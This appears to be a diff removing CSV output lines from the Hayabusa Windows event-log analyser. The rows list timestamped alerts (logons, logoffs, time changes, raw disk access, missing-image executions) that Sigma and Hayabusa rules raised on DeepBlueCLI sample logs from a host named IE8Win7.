-2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 